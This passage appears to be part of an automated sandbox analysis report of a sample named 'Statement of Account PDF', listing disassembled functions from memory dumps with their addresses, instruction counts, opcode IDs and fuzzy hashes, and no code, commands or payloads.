                                                        • Instruction Fuzzy Hash: F8211A78E0924E8FCB00DFA8D5408EEBBF1FB49310F105566D515AB295D7345E01CFA1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 074AE0D8 Relevance: 1.3, Strings: 1, Instructions: 58COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1709983632.00000000074A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074A0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_74a0000_Statement of Account PDF.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: Te^q
                                                        • API String ID: 0-671973202
                                                        • Opcode ID: 55f93c9582628792d29e1ee9e00d35b32f5e7f13eccf5da627213b1a93788105
                                                        • Instruction ID: c068626a911b38dc6d9ed19fc842571160912ebdd84435649b84c96dc9473bde
                                                        • Opcode Fuzzy Hash: 55f93c9582628792d29e1ee9e00d35b32f5e7f13eccf5da627213b1a93788105
                                                        • Instruction Fuzzy Hash: A2115171F0022A9BCB14EBB9D9115EFB7F2AF95210F10006AC415E7344EB358E06CBE2
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 06CE8B9F Relevance: 1.3, Strings: 1, Instructions: 53COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1707419050.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_6ce0000_Statement of Account PDF.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: (bq
                                                        • API String ID: 0-149360118
                                                        • Opcode ID: e599348e641e633300c97b2460ea2890b58b265f27ae87e93d0f567fc74be18f
                                                        • Instruction ID: 9e9045b536c91bf5e7918e971d93f23d213210b392f00c24f8ed10e11af20883
                                                        • Opcode Fuzzy Hash: e599348e641e633300c97b2460ea2890b58b265f27ae87e93d0f567fc74be18f
                                                        • Instruction Fuzzy Hash: AA019E71E0525A8FCF44EFB9D8051EEBBB2EF86312F20456AD215F7240EB305A468B91
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 06CEF2E4 Relevance: 1.3, Strings: 1, Instructions: 44COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1707419050.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_6ce0000_Statement of Account PDF.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: Te^q
                                                        • API String ID: 0-671973202
                                                        • Opcode ID: af970e50916eb770558bcd315e4aade41a3f762af026368e0b29f8507c2afd73
                                                        • Instruction ID: bb8bb597d7735c818b58e9c9ee00dfc988b1d35c0e9fdcc69cd1e40eee09aab1
                                                        • Opcode Fuzzy Hash: af970e50916eb770558bcd315e4aade41a3f762af026368e0b29f8507c2afd73
                                                        • Instruction Fuzzy Hash: 31117F75E002199FCF08DFE8D8849ADBBB2FB88310F10812AE919AB365C7356945DF50
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 04EE5228 Relevance: .8, Instructions: 755COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1706038482.0000000004EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EE0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_4ee0000_Statement of Account PDF.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 612a3b1957c0f6652fc46315043190ee2ec287ea2ebe781294334e08e9ec4dca
                                                        • Instruction ID: 10c6084254ed491bc2d06bde65568db619bca133ef8503578d48ec9fb9aa7731
                                                        • Opcode Fuzzy Hash: 612a3b1957c0f6652fc46315043190ee2ec287ea2ebe781294334e08e9ec4dca
                                                        • Instruction Fuzzy Hash: 66621E74D00B45DADB319BB6D58C3BEB6E2AB41308F516D1FC4BACE390DB35A4818B45
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 04EE51C9 Relevance: .5, Instructions: 487COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1706038482.0000000004EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EE0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_4ee0000_Statement of Account PDF.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 1e23b605c43c216784164ef278a1be9a7d40c418132d2ed8bf8a2b1e7ed7217f
                                                        • Instruction ID: d9ea76a61c77b8706d49d7521b5f96249b081dd12421c500433037d905411cc0
                                                        • Opcode Fuzzy Hash: 1e23b605c43c216784164ef278a1be9a7d40c418132d2ed8bf8a2b1e7ed7217f
                                                        • Instruction Fuzzy Hash: 5F228EB4905B86DADB719BA5D48C2AF76E0AB0130CF216D1BC4FACE351D734E086CB45
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 06CE084B Relevance: .4, Instructions: 410COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1707419050.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_6ce0000_Statement of Account PDF.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: a2720c8b2c2bd9d90f605da33c01ecbce4ec13d7784e5a343827c073706ca9ed
                                                        • Instruction ID: 467f73dbb6ba244e8695daba79dde6b5e2ba4eca7c6b6238283310354420f828
                                                        • Opcode Fuzzy Hash: a2720c8b2c2bd9d90f605da33c01ecbce4ec13d7784e5a343827c073706ca9ed
                                                        • Instruction Fuzzy Hash: CB02E534B401089FDB54DF68D498A6DBBF2FF88314F1585A8E4099B366CB71ED85CB90
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 04EEA128 Relevance: .2, Instructions: 219COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1706038482.0000000004EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EE0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_4ee0000_Statement of Account PDF.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 5abd77dd9b28e2e09e9d62bfd2ce39127f6a2ba01da35e803757376d10fa1470
                                                        • Instruction ID: 056b947c33767962e58d4a433f5c6321fcab62069b700737fe3c0478ef8c026f
                                                        • Opcode Fuzzy Hash: 5abd77dd9b28e2e09e9d62bfd2ce39127f6a2ba01da35e803757376d10fa1470
                                                        • Instruction Fuzzy Hash: 4781D038710600CFCB14EF69D49896A7BF6BF89B05B1541A9E516CB3B6DB71EC41CB80
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 074AF6F8 Relevance: .2, Instructions: 187COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1709983632.00000000074A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074A0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_74a0000_Statement of Account PDF.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 7e7ac1a0e199c4b29091b9b61e9fa9dc0d279b8737f8dcba9064c9f0b49e7cd7
                                                        • Instruction ID: a7dd9ab19906c8329717dc8ce4d8ed2f7ed1907747a58367a200ae43be142516
                                                        • Opcode Fuzzy Hash: 7e7ac1a0e199c4b29091b9b61e9fa9dc0d279b8737f8dcba9064c9f0b49e7cd7
                                                        • Instruction Fuzzy Hash: 5D613BB4D19209EFCB14CFE9D4446EEBBBAFF9A300F10942AE419A7255D7309946CF40
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 04EE8F30 Relevance: .2, Instructions: 168COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1706038482.0000000004EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EE0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_4ee0000_Statement of Account PDF.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: c0ac697cb3d71c18e1258feb90e3c87fb06df5078b722db165525f093414b922
                                                        • Instruction ID: fb6d9cd19fde4d178a58115384bda30af1e5a52bdd802da81e04a65498d3399f
                                                        • Opcode Fuzzy Hash: c0ac697cb3d71c18e1258feb90e3c87fb06df5078b722db165525f093414b922
                                                        • Instruction Fuzzy Hash: 01717C74A01208EFCB15DFA9D894DAEBBB6FF48724B514498F901AB361DB31EC81CB50
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 04EEDB48 Relevance: .2, Instructions: 156COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1706038482.0000000004EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EE0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_4ee0000_Statement of Account PDF.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 341c1a6fb7eb9fcf28221bbb01f5302a2faeed2d695e2782d72ec7e3f1685b91
                                                        • Instruction ID: c363a50562c2a838cf4c47743054977c5333308592d20c285ef506fabc7ca149
                                                        • Opcode Fuzzy Hash: 341c1a6fb7eb9fcf28221bbb01f5302a2faeed2d695e2782d72ec7e3f1685b91
                                                        • Instruction Fuzzy Hash: C7519032A0050A9FDF10CFA6DC40AFEB3B6EF85754F0984A6E904EB261D775E906CB40
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 04EEBB20 Relevance: .2, Instructions: 152COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1706038482.0000000004EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EE0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_4ee0000_Statement of Account PDF.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 0650b7977a66f1276f872e6e7c18b7dea390d6fb59912bf8c8390cde211a1aa0
                                                        • Instruction ID: a2e7e3654c54faf8e3bb978d54a7d259bcdef0d469e9cfd38c03433364ec4565
                                                        • Opcode Fuzzy Hash: 0650b7977a66f1276f872e6e7c18b7dea390d6fb59912bf8c8390cde211a1aa0
                                                        • Instruction Fuzzy Hash: CC518E71E002499FDB14DFAAD844ABFBBF9EFC8310F10846AD455E7250DB34A945CBA0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 04EE8B60 Relevance: .2, Instructions: 150COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1706038482.0000000004EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EE0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_4ee0000_Statement of Account PDF.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 920dc6a023720a175a48c9f667a6820aa44315c2c0b519826e8b6a76a415a6ef
                                                        • Instruction ID: bab387bf393558111e6540477f6f42147db0fe4c86e95fe68af4055b53692407
                                                        • Opcode Fuzzy Hash: 920dc6a023720a175a48c9f667a6820aa44315c2c0b519826e8b6a76a415a6ef
                                                        • Instruction Fuzzy Hash: CA51B0317002008FD714AF69D494AEE7BF6EF89304F1449A9D10ADB362DB75EC45DB91
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 06CEFA10 Relevance: .1, Instructions: 138COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1707419050.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_6ce0000_Statement of Account PDF.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: aaf43fde2719f514430f0c3c87d6f271f62ae7eec1e6de0c543cad1134a6224a
                                                        • Instruction ID: b4048506a326832f55836405a82a1aacc533ff92a66326fed57c2a8b0d0950f3
                                                        • Opcode Fuzzy Hash: aaf43fde2719f514430f0c3c87d6f271f62ae7eec1e6de0c543cad1134a6224a
                                                        • Instruction Fuzzy Hash: 6E418E74E092188FDB44CFAAD8446EEBBF6EF8D301F14D02DE419A7251D7344A40CB90
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 04EE8F21 Relevance: .1, Instructions: 127COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1706038482.0000000004EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EE0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_4ee0000_Statement of Account PDF.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: b7a1caee21e2321cc6e0b1505321c38315e2ad6a0fd40b3967f9a6021fc65c6c
                                                        • Instruction ID: f1a75613562221b0c17a58f0d8bfc5152e06362590e83730f8ee08cc994d2fc5
                                                        • Opcode Fuzzy Hash: b7a1caee21e2321cc6e0b1505321c38315e2ad6a0fd40b3967f9a6021fc65c6c
                                                        • Instruction Fuzzy Hash: 6B51B278A11208AFCB14DF69D894DADBBB2FF49724B114498F901AB361DB31EC81CF50
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 04EEAA78 Relevance: .1, Instructions: 124COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1706038482.0000000004EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EE0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_4ee0000_Statement of Account PDF.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 2a30f908ca0bbabfbced8adfa43c25fed5d328895402b4065974350248ec4c2e
                                                        • Instruction ID: c02e2daaa343bee939136e613eda25606b3155f6f5cda714791090342432ab4a
                                                        • Opcode Fuzzy Hash: 2a30f908ca0bbabfbced8adfa43c25fed5d328895402b4065974350248ec4c2e
                                                        • Instruction Fuzzy Hash: 11418175E002088FEB14EFB6D0506BDBAB2EFC8618F14547DD501AB284DB38A981CB95
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 06CE1351 Relevance: .1, Instructions: 122COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1707419050.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_6ce0000_Statement of Account PDF.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: b41d9e7f48e938e257ed63e37789171e3111a5e5228db82f9be1e0fca679506d
                                                        • Instruction ID: 08de39e9c4cf0581a7f6b3c7c0321568ad00bbfdaa3b589831ee2bd336171f26
                                                        • Opcode Fuzzy Hash: b41d9e7f48e938e257ed63e37789171e3111a5e5228db82f9be1e0fca679506d
                                                        • Instruction Fuzzy Hash: CF41D4307006018FD7A59F25C894B7EB3F2BF85324F14856ED0158BBA1CB71AD56CB91
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 04EEE548 Relevance: .1, Instructions: 118COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1706038482.0000000004EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EE0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_4ee0000_Statement of Account PDF.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: a5b4fa052703c99b5c9d16e23c69252e5374d01863bb712fc3719d845b5164ce
                                                        • Instruction ID: 13729e6126bc4ca4ce9f299d0dd5fc19e0863f9fca82295e1c9e0f548a06c734
                                                        • Opcode Fuzzy Hash: a5b4fa052703c99b5c9d16e23c69252e5374d01863bb712fc3719d845b5164ce
                                                        • Instruction Fuzzy Hash: 8F410734A002198FDB14EFA9C855BEDB7B1BF89314F114068E505BB3A1DB79E845CFA0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 06CE1360 Relevance: .1, Instructions: 117COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1707419050.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_6ce0000_Statement of Account PDF.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 164f6b5286f0f1b8196bc6da0145581a262cdd1d6cc4a17f7099a43a779b59cc
                                                        • Instruction ID: 5b0effd946b423b327994f590aa086c748103fe5c18fbc042df84c77657eefab
                                                        • Opcode Fuzzy Hash: 164f6b5286f0f1b8196bc6da0145581a262cdd1d6cc4a17f7099a43a779b59cc
                                                        • Instruction Fuzzy Hash: E5417E307006019FD7A9AF25C894B6EB3B2BF85324F14862DD1168B7A0CB71ED46DB91
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 04EE4948 Relevance: .1, Instructions: 108COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1706038482.0000000004EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EE0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_4ee0000_Statement of Account PDF.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 830b6744617cbd93dd86b7a78a1b7fcad3a620f2cfac0bf7b65da0eb1630b024
                                                        • Instruction ID: cd11b35d1748ff68660173d3192d9c8c1422a83cfc3677249e2bbb881d7ee6ef
                                                        • Opcode Fuzzy Hash: 830b6744617cbd93dd86b7a78a1b7fcad3a620f2cfac0bf7b65da0eb1630b024
                                                        • Instruction Fuzzy Hash: B04104B1D00359CFDB10DFAAC584ADEBBB1BF48304F24802AD408AB251D775AA4ACF90
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 06CE8C28 Relevance: .1, Instructions: 106COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1707419050.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_6ce0000_Statement of Account PDF.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 934b718e558af25d204acef514f419dd63a58fbc65dbcc2ed9e47e009c4e04a1
                                                        • Instruction ID: 180b2683937144b8843e6866d05e5d28ac3df7fc52410982b9a3b097e135c5d3
                                                        • Opcode Fuzzy Hash: 934b718e558af25d204acef514f419dd63a58fbc65dbcc2ed9e47e009c4e04a1
                                                        • Instruction Fuzzy Hash: 4F413E34E111098BDB54DBA9D994BAEBBF2BF88700F24856AE511B7350DB719D01CB90
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 04EEAA53 Relevance: .1, Instructions: 103COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1706038482.0000000004EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EE0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_4ee0000_Statement of Account PDF.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 04730bef0997442d5b447129dd7bd6800e2d868f3e399d9ba236f46313eb899d
                                                        • Instruction ID: 39585fe1f8c53b3451f727135eada7fe694cc1c7cdd5d4e33dfb7de7cb4483e8
                                                        • Opcode Fuzzy Hash: 04730bef0997442d5b447129dd7bd6800e2d868f3e399d9ba236f46313eb899d
                                                        • Instruction Fuzzy Hash: 7331B475E002058BEB14EB76C0546FE7BB2EF84208F10547DC502AB280DB79A982CBA2
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 04EE497C Relevance: .1, Instructions: 102COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1706038482.0000000004EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EE0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_4ee0000_Statement of Account PDF.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 75de8b869ab167abfaca5f5c7d4884f42abf956cbd90f4ad3d67c9763aea5231
                                                        • Instruction ID: 07a95caed4fb5843efe63ec338f8d20120b01b86932caa366fb433853e3df07d
                                                        • Opcode Fuzzy Hash: 75de8b869ab167abfaca5f5c7d4884f42abf956cbd90f4ad3d67c9763aea5231
                                                        • Instruction Fuzzy Hash: 8531D231A04659DBCF00CFA9E8904BE7BB5FF85708F14856AE804DB256F636DC46C7A1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 04EE4E94 Relevance: .1, Instructions: 101COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1706038482.0000000004EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EE0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_4ee0000_Statement of Account PDF.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: ca2cb7edf2e5dd55141cbf0ae7789ada28005222d220ecc07777f9731f933f95
                                                        • Instruction ID: ea483ffe182fbf278bea9c87a99fa1456491c63d6fb905775e8cad05599db668
                                                        • Opcode Fuzzy Hash: ca2cb7edf2e5dd55141cbf0ae7789ada28005222d220ecc07777f9731f933f95
                                                        • Instruction Fuzzy Hash: 9441D1B1D0020DDFDB10CFAAC984ADEBBB5BF48304F248029D418BB254D775AA4ACF90
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 074AF9F8 Relevance: .1, Instructions: 101COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1709983632.00000000074A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074A0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_74a0000_Statement of Account PDF.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 0ed4a5b069dd53ea12635b16a9cabf762f6f1189ba655270cc9643a517f8d0ee
                                                        • Instruction ID: 63a6eb37a58182921dd99097b0bf6e37df711b4131716489561840437cc8f5a3
                                                        • Opcode Fuzzy Hash: 0ed4a5b069dd53ea12635b16a9cabf762f6f1189ba655270cc9643a517f8d0ee
                                                        • Instruction Fuzzy Hash: 3131C2B1A09389AFCB05DF74D8554EE7FF8EF5621072484BBD845C7252EA309D06C761
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 06CE4B11 Relevance: .1, Instructions: 100COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1707419050.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_6ce0000_Statement of Account PDF.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 8cc8bc466a3ae1a4db1b84636dd269183b149bb3ecd25c7943e8698c1b65a1fc
                                                        • Instruction ID: bc9d58deccd078e6616aae8b032a05b29809b6c0bf54c2735a3b6b0df7e074f9
                                                        • Opcode Fuzzy Hash: 8cc8bc466a3ae1a4db1b84636dd269183b149bb3ecd25c7943e8698c1b65a1fc
                                                        • Instruction Fuzzy Hash: 79316D35B002149FCB18DF68D884AAEBBB6FF88220F118299E5258B3B1D771DD41CB90
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 04EE4964 Relevance: .1, Instructions: 99COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1706038482.0000000004EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EE0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_4ee0000_Statement of Account PDF.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 4d62393d02207341d4254506b246886b108cbfbf5f69c085cac66a3f2512fd3f
                                                        • Instruction ID: bdb72312b14446756837143867e4ac2b3a12ad662c40971fd28ca4925fc7e8fd
                                                        • Opcode Fuzzy Hash: 4d62393d02207341d4254506b246886b108cbfbf5f69c085cac66a3f2512fd3f
                                                        • Instruction Fuzzy Hash: 7041BFB1D0020DDFDB24DFAAC584ADEBBB5AF48704F649029D408BB254D775AA4ACF90
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 04EEE410 Relevance: .1, Instructions: 98COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1706038482.0000000004EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EE0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_4ee0000_Statement of Account PDF.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: c9b50c1a03631e4b7200f4027034dc4d26892c5e8ba8a80e09003536e32be504
                                                        • Instruction ID: eb05ec2d49ead8b2917b3a9853494669b81f6e0f12284f4c6c425bd13185b6a7
                                                        • Opcode Fuzzy Hash: c9b50c1a03631e4b7200f4027034dc4d26892c5e8ba8a80e09003536e32be504
                                                        • Instruction Fuzzy Hash: 7B31DF31B042848FCB19EB7DD81456E7BB6FFC5310B1485BAD049DB3A5DE34AC4A8B91
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 074AFCF0 Relevance: .1, Instructions: 98COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1709983632.00000000074A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074A0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_74a0000_Statement of Account PDF.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 2e453d4316a4455fd9708f2482c5ceb685ef42b2b2765d26527d0a302b7a5b80
                                                        • Instruction ID: 71866abc2c01981bb563a74d2b5fa1d370b2bdda4001713e506c215960639331
                                                        • Opcode Fuzzy Hash: 2e453d4316a4455fd9708f2482c5ceb685ef42b2b2765d26527d0a302b7a5b80
                                                        • Instruction Fuzzy Hash: B8210571B001659FCB55ABBE98146AFBBEBFFE4250720453AD506D7380DE34CE0683A2
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 06CE20C8 Relevance: .1, Instructions: 97COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1707419050.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_6ce0000_Statement of Account PDF.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: a241d8ebcccddd70d7e86dbd80ea7c7de7281dd3286f7ac2f936ff70ee6c4c0a
                                                        • Instruction ID: 8b982f55422a30e2d2fcf289aa91d3eba684c4a6e29796abb6daa54851f1c290
                                                        • Opcode Fuzzy Hash: a241d8ebcccddd70d7e86dbd80ea7c7de7281dd3286f7ac2f936ff70ee6c4c0a
                                                        • Instruction Fuzzy Hash: E1311A347006008FDB98DB69C894B6973FAEF89614F1580ADE51ACB361DB39EE41CB90
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 06CE20B8 Relevance: .1, Instructions: 96COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1707419050.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_6ce0000_Statement of Account PDF.jbxd
                                                        Similarity
